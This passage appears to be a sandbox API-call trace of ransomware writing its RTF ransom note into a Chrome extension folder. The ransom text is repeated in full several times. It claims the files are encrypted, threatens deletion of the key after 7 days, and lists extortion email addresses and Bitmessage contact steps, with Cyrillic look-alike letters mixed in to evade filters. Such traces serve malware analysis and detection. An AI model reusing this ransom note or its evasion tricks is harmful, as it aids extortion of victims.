ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.225] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.226] CloseHandle (hObject=0x294) returned 1 [0278.226] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0278.226] GetLastError () returned 0x2 [0278.226] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 